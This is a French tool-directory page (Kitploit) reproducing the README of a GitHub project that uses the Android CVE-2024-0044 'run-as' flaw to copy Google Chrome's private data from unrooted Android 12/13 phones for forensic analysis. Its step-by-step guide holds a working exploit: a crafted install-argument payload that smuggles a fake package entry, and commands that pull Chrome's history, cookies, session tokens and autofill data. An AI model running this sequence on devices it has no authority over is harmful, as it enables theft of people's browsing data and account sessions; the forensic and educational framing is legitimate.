Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Chrome-Forensic_CVE-2024-0044 — Un outil robuste de criminalistique numérique pour extraire et analyser les artefacts de Google Chrome depuis des appareils Android. | Kitploit
Outils/GitHubGitHub/jacktekno/chrome-forensic_cve-2024-0044
Sécurité AndroidAnalyse des VulnérabilitésExploitationAnalyse ForensiqueCriminalistique MobileRécupération de DonnéesCriminalistique NumériqueSécurité MobileApprentissage et Éducation

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
GitHubjacktekno/chrome-forensic_cve-2024-0044

Chrome-Forensic_CVE-2024-0044

Un outil robuste de criminalistique numérique pour extraire et analyser les artefacts de Google Chrome depuis des appareils Android.

Voir le dépôt
110il y a 8 moisPas encore vérifié

🔍 Chrome Forensic - CVE-2024-0044

Version Python License Platform

Un outil robuste de criminalistique numérique pour extraire et analyser les artefacts Google Chrome depuis des appareils Android

Fonctionnalités • Installation • Utilisation • Documentation


👤 Informations sur l'auteur

Auteur : JackTekno
GitHub : github.com/JackTekno


📋 Aperçu

Cet outil exploite la vulnérabilité CVE-2024-0044 (Run-as) pour contourner les restrictions de permissions sur les appareils Android 12/13 non rootés, permettant l'extraction judiciaire des données de Google Chrome. L'outil analyse les bases de données SQLite brutes et génère des rapports d'analyse complets.

🔄 Flux de traitement

Forensic Analysis Flowchart

Flux de travail complet de l'analyse judiciaire, de l'acquisition au rapport


📊 Fonctionnalités & Résultats

L'outil génère un rapport Excel complet (result_chrome_forensic.xlsx) avec les feuilles suivantes :


🛠️ Prérequis

Configuration matérielle

  • 📱 Téléphone Android (Android 12/13)
  • 💻 PC (Linux/Windows/Mac)

Environnement testé

  • 🐧 OS : Linux UOS 20 Professionnel

Logiciels requis

  • 🐍 Python 3.x
  • 📲 ADB (Android Debug Bridge)
  • 📦 Fichier APK factice (par ex., F-Droid.apk)

🚀 Installation

  1. Cloner le dépôt

    root@kitploit:~
    git clone https://github.com/JackTekno/Chrome-Forensic_CVE-2024-0044.git
    cd Chrome-Forensic_CVE-2024-0044
    
  2. Installer les dépendances

    root@kitploit:~
    pip install -r requirements.txt
    

🔓 Guide d'acquisition des données

Étape 1 : Préparer l'appareil

  1. Accédez à Paramètres → À propos du téléphone
  2. Appuyez 7 fois sur Numéro de build pour activer les options développeur
  3. Allez dans Paramètres → Système → Options développeur
  4. Activez Débogage USB
  5. Connectez le téléphone au PC via USB et autorisez la connexion

Étape 2 : Préparer l'exploit

root@kitploit:~
# Envoyer un APK factice dans un dossier temporaire
adb push F-Droid.apk /data/local/tmp/base.apk

Étape 3 : Trouver l'UID cible

root@kitploit:~
adb shell pm list packages -U | grep com.android.chrome
# Exemple de sortie : package:com.android.chrome uid:10129
# Notez l'UID (ex. 10129)

Étape 4 : Exécuter l'exploit

⚠️ Remplacez 10129 par l'UID réel de Chrome obtenu à l'étape 3

root@kitploit:~
adb shell

# Dans le shell ADB :
PAYLOAD="@null
victim 10129 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"

# Déclencher le gestionnaire de paquets
pm install -i "$PAYLOAD" /data/local/tmp/base.apk

Étape 5 : Extraire les données

root@kitploit:~
# Toujours dans le shell ADB
run-as victim tar -cf - /data/data/com.android.chrome/ | cat > /data/local/tmp/chrome.tar

# Quitter le shell ADB
exit

Étape 6 : Récupérer les données sur le PC

root@kitploit:~
adb pull /data/local/tmp/chrome.tar .

Étape 7 : Décompresser les données

Extrayez le fichier 'chrome.tar' dans le dossier du projet. Vous n'avez pas besoin de déplacer les fichiers manuellement. Le script Python trouvera automatiquement les fichiers de base de données dans les dossiers extraits.

root@kitploit:~
tar -xf chrome.tar

💻 Utilisation

Exécutez l'outil d'analyse judiciaire :

root@kitploit:~
python3 chrome_forensic.py

L'outil analysera les fichiers de base de données et générera result_chrome_forensic.xlsx dans le même répertoire.


⚖️ Avertissement légal

⚠️ IMPORTANT : Cet outil est conçu uniquement à des fins d'analyse judiciaire éducative et autorisée.

  • Utilisez-le uniquement sur des appareils vous appartenant ou pour lesquels vous disposez d'une autorisation écrite explicite
  • L'accès non autorisé à des appareils numériques peut enfreindre les lois de votre pays
  • Les auteurs déclinent toute responsabilité en cas d'utilisation abusive de cet outil

🤝 Contribution

Les contributions sont les bienvenues ! N'hésitez pas à soumettre une Pull Request.


📄 Licence

Ce projet est sous licence GNU General Public License v3.0. Consultez le fichier LICENSE pour plus de détails.


👤 Crédits

La preuve de concept de la méthode d'acquisition a été résumée et partagée par Tinyhack.com.


Réalisé avec ❤️ par JackTekno

⭐ Donner une étoile à ce dépôt • 🐛 Signaler un bug • 💡 Proposer une fonctionnalité

Télécharger l’outil
Nom de la feuilleDescription
📖 Historique de navigationChronologie détaillée des URL visitées
📈 Analytique – Sites les plus visitésClassement statistique des domaines les plus fréquentés
⚠️ ALERTES – SuspectsURL signalées automatiquement (hacking, drogues, contenu adulte)
📥 TéléchargementsHistorique des téléchargements avec chemins et tailles
🔍 Termes de rechercheRequêtes de recherche de l'utilisateur dans l'omnibox/Google
🍪 Cookies & SessionsJetons de session et métadonnées des cookies (chiffrés en hexadécimal)
✍️ Données de saisie automatiqueDonnées de formulaires enregistrées (noms, adresses, etc.)